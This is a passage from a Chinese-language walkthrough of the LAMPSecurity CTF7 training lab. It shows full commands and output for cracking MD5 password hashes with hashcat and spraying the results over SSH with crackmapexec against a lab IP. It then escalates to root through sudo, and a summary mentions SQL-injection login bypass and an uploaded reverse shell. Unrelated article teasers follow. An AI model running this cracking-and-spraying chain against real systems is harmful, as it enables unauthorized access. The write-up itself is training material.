| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}'                                      
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6

                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}' > hash.lst     
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hash.lst 
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6

识别一下哈希的类型

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'       
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))


使用 hashcat 破解md5

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents                 
Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.lst
Time.Started.....: Fri Sep 27 14:46:20 2024 (4 secs)
Time.Estimated...: Fri Sep 27 14:46:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4226.1 kH/s (0.12ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 29%

Started: Fri Sep 27 14:46:18 2024
Stopped: Fri Sep 27 14:46:25 2024


把密码的字符串清洗一下,存到一个文件里 password.lst

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hashcat.result 
ed2539fe892d2c52c42a440354e8e3d5:madrid                   
4cb9c8a8048fd02294477fcb1a41191a:changeme                 
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234                 
098f6bcd4621d373cade4e832627b4f6:test                     
b2a97bcecbd9336b98d59d9324dae5cf:chuck33                  
2146bf95e8929874fc63d54f50f1d2e3:turtles77                
9c42a1346e333a770904b2a2b37fa7d3:somepassword             
e22f07b17f98e0d9d364584ced0e3c18:my2cents    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}'                 
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}' > password.lst
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat password.lst  
madrid                   
changeme                 
qwer1234                 
test                     
chuck33                  
turtles77                
somepassword             
my2cents 

尝试用户名和密码

一个个的尝试比较慢,使用工具更高效

工具 crackmapexec 在域渗透较多使用,这里只是简单使用

crackmapexec 的运行结果是这样,尝试使用 grep 显示 + 加号 存在的行,方便观察

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success          
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH         192.168.50.156  22     192.168.50.156   [*] SSH-2.0-OpenSSH_5.3
SSH         192.168.50.156  22     192.168.50.156   [-] brian:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] brian:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [-] john:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] john:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [-] alice:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] alice:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:qwer1234 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:turtles77 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:somepassword Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] ruby:my2cents Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:madrid Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:changeme Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [-] leon:test Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:chuck33 Authentication failed.
SSH         192.168.50.156  22     192.168.50.156   [-] leon:turtles77 Authentication failed.

使用 grep 让它变得容易观察

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success | grep '+' 
SSH         192.168.50.156  22     192.168.50.156   [+] brian:my2cents 
SSH         192.168.50.156  22     192.168.50.156   [+] alice:turtles77 
SSH         192.168.50.156  22     192.168.50.156   [+] leon:qwer1234 
SSH         192.168.50.156  22     192.168.50.156   [+] julia:madrid 
SSH         192.168.50.156  22     192.168.50.156   [+] michael:somepassword 
SSH         192.168.50.156  22     192.168.50.156   [+] charles:chuck33

用户 brain 的权限是 all all,权限很高

mysql> exit
exit
Bye
bash-4.1$ su brian
su brian
Password: my2cents

[brian@bogon inc]$ whoami
whoami
brian
[brian@bogon inc]$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for brian: my2cents

Matching Defaults entries for brian on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brian may run the following commands on this host:
    (ALL) ALL


拿下 root

拿下 root

[brian@bogon inc]$ sudo /bin/bash
sudo /bin/bash
[root@bogon inc]# whoami
whoami
root
[root@bogon inc]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
    inet6 fe80::20c:29ff:fe9d:12a9/64 scope link 
       valid_lft forever preferred_lft forever
[root@bogon inc]# 

总结

主机扫描,我们比较感兴趣的端口有 80, 8080
爆一下 80 端口的目录,80 端口是一个 cms,爆破使用 dirb
8080是 cms 后台的页面,sql 注入万能密码登录进入
在后台传个反弹 shell,在爆破目录 asset 中找到 shell 的上传位置
kali 拿到 shell 后使用 python 升级 shell
继续在内网中收集信息,发现数据库连接的配置文件
使用 mysql 进入数据库,账号为 root,密码为空
在 website 数据库中找到 users 表,拿到账户名和密码哈希
使用 crackmap 做密码碰撞,使用用户 brain,sudo -l 查看当前账户的权限
使用 sudo /bin/bash 以管理员身份启动一个 bash 的进程,拿到 root 权限
结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2180861.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

业绩由盈转亏,全面冲刺大模型的360值得期待吗?

在中国互联网市场上&#xff0c;360无疑是一家大家家喻户晓的公司&#xff0c;从安全软件起家&#xff0c;360的服务已经延展到了市场的方方面面&#xff0c;就在最近360的财报正式公布&#xff0c;很多人都在问360的财报该怎么看&#xff1f;全面冲刺大模型的360值得我们期待吗…

.net Framework 4.6 WebAPI 使用Hangfire

C# 使用 Hangfire 第一章 .net Framework 4.6 WebAPI 使用Hangfire 文章目录 C# 使用 Hangfire前言一、hangfire是什么?二、hangfire的特点三、.net Framework 中hangfire的使用方法第一步:创建WebAPI控制器第二步:添加nuget包第三步 创建startup类新建项目startup类Startu…

企业数据安全从0到1建设方法

随着中国数字经济的不断发展&#xff0c;各行各业都在积极推进数字化转型&#xff0c;数据安全逐渐受到国家和企业的重视。 近年来&#xff0c;国家持续颁布多种行业数据安全管理办法&#xff0c;明确各行业数据安全的建设标准&#xff0c;督促企业进行数据安全建设。 企业应该…

Delphi12 FMX给组件加上一个动画效果

Delphi12 FMX给组件加上一个动画效果 Delphi12 FMX 已经能编写windows&#xff0c;android平台下运行的应用&#xff0c;这里来体验一下 实现非常简单&#xff0c;使用IDE自带的动画组件轻松实现 效果图 这里用TCircle及 TImage来进行演示 首选拖入两个 TCircle及TImage …

安达发|太阳能设备行业APS计划排程软件能解决哪些问题

在当今快速发展的太阳能设备行业中&#xff0c;高级计划与排程&#xff08;APS&#xff09;软件成为了企业优化生产流程、提高生产效率和满足市场需求的关键工具。APS软件通过集成先进的算法和数据分析技术&#xff0c;为企业提供了一个全面的生产计划和排程解决方案。本文将探…

T5打卡-运动鞋识别

&#x1f368; 本文为&#x1f517;365天深度学习训练营中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 1.导入及查看数据&#xff1a; from tensorflow import keras from tensorflow.keras import layers,models import os,PIL,pathlib import matplotlib.pyplo…

AI与大数据的结合:如何从海量数据中提取价值

引言 在当今数字化时代&#xff0c;数据如同新石油&#xff0c;成为推动社会与商业进步的重要资源。随着物联网、社交媒体和企业运营中数据生成的激增&#xff0c;我们正处在一个数据爆炸的时代。然而&#xff0c;面对海量且复杂的数据信息&#xff0c;仅依靠传统的分析方法已经…

Python入门:asyncio异步编程结果处理

文章目录 📖 介绍 📖🏡 演示环境 🏡📒 文章内容 📒📝 处理异步任务的基本概念📝 获取第一个结果📝 添加回调函数📝 使用`return_exceptions`处理异常📝 判断任务完成情况📝 获取结果详情⚓️ 相关链接 ⚓️📖 介绍 📖 在Python编程中,异步并发可能…

钉钉H5微应用Springboot+Vue开发分享

文章目录 说明技术路线注意操作步骤思路图 一、创建钉钉应用二、创建java项目三、创建vue项目&#xff08;或uniapp项目&#xff09;&#xff0c;npm引入sdk的依赖四、拥有公网域名端口。开发环境可以使用&#xff08;贝锐花生壳等工具&#xff09;五、打开钉钉开发者平台&…

【YashanDB知识库】客户端字符集与数据库字符集兼容问题

本文转自YashanDB官网&#xff0c;具体内容请见https://www.yashandb.com/newsinfo/7352675.html?templateId1718516 问题现象 客户端yasql配置字符集为GBK&#xff0c;服务端yasdb配置字符集为UTF8&#xff0c;之后执行语句&#xff1a; 会发现&#xff1a; 期望是两个都…

【LeetCode】每日一题 2024_9_29 买票需要的时间(模拟)

前言 每天和你一起刷 LeetCode 每日一题~ LeetCode 启动&#xff01; 昨天的每日一题是线段树二分&#xff0c;题目难度远超我的能力范围&#xff0c;所以更不出来了 题目&#xff1a;买票需要的时间 代码与解题思路 func timeRequiredToBuy(tickets []int, k int) (sum in…

【Kubernetes知识点】 解读 Service 和 EndpointSlice 之间的关系

【Kubernetes知识点】 解读 Service 和 EndpointSlice 之间的关系 目录 1 概念 1.1 Service的概念1.2 Endpoint 的概念1.3 EndpointSlice 的引入 1.3.1 EndpointSlice支持的地址1.3.2 EndpointSlice的状态1.3.3 EndpointSlice的拓扑信息 1.4 Service 、Endpoint和 EndpointSl…

Beyond Compare 比较CRC值、二进制比较、关联规则比较,有何区别?(CRC比较、CRC值比较)

文章目录 Beyond Compare文件比较方法深入分析CRC值比较定义及工作原理应用场景优点和缺点 二进制比较定义及工作原理应用场景优点和缺点 关联规则比较定义及工作原理应用场景优点和缺点 比较示例 性能差异CRC值比较的性能影响优点缺点 二进制比较的性能影响优点缺点 关联规则比…

C项目--带权限的图书管理系统(1000多行代码,代码数据可下载,极其适合初学练手)

本专栏目的 更新C/C的相关的项目 前言 C语言的图书权限管理系统完结(进阶的一点后面更新)&#xff0c;1000多行代码(核心代码5、600行&#xff09;&#xff1b;本设计是一个比较综合的练习&#xff0c;用到数据结构&#xff08;顺序表、链表、静态链表&#xff09;、文件、排…

发布-订阅模式演示示例

<!DOCTYPE html> <html lang="en"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>发布-订阅模式示例</title><styl…

LC记录一:寻找旋转数组最小值、判断旋转数组是否存在给定元素

文章目录 33.搜索旋转排序数组81.搜索旋转排序数组||153.寻找旋转排序数组中的最小值154.寻找旋转排序数组中的最小值||参考链接 33.搜索旋转排序数组 https://leetcode.cn/problems/search-in-rotated-sorted-array/description/ 下面这张图片是LC154题官方题解提供的一个图…

重磅!25年3月起,PMP®考试将启用新教材!

近期&#xff0c;PMI对各科目教材进行了调整。9月27日宣布了2025年3月将会更新ACP的考试内容&#xff0c;新版考试仍将围绕敏捷思维和产品交付&#xff0c;但考试内容大纲(ECO)将整合为四大领域&#xff08;思维、领导力、产品、交付&#xff09;&#xff0c;融合现代新的项目类…

DAY18||530.二叉搜索树的最小绝对值差 |501.二叉搜索树中的众数| 236.二叉树的最近公共祖先

530.二叉搜索树的最小绝对值差 题目&#xff1a;530. 二叉搜索树的最小绝对差 - 力扣&#xff08;LeetCode&#xff09; 给你一个二叉搜索树的根节点 root &#xff0c;返回 树中任意两不同节点值之间的最小差值 。 差值是一个正数&#xff0c;其数值等于两值之差的绝对值。 …

MongoDB 快速入门+单机部署(附带脚本)

目录 介绍 体系结构 数据模型 BSON BSON 数据类型 特点 高性能 高可用 高扩展 丰富的查询支持 其他特点 部署 单机部署 普通安装 脚本安装 Docker Compose 安装 卸载 停止 MongoDB 删除包 删除数据目录 参考&#xff1a; https://docs.mongoing.com/ 介绍…

Ping到底干了啥?ICMP 协议详解

什么是 ICMP&#xff1f; ICMP&#xff08;Internet Control Message Protocol&#xff0c;互联网控制消息协议&#xff09;是一种网络层协议&#xff0c;主要用于在网络设备之间传递控制信息和错误消息。它是 IP 协议族的一部分&#xff0c;通常与 IP 协议一起使用。ICMP 的主…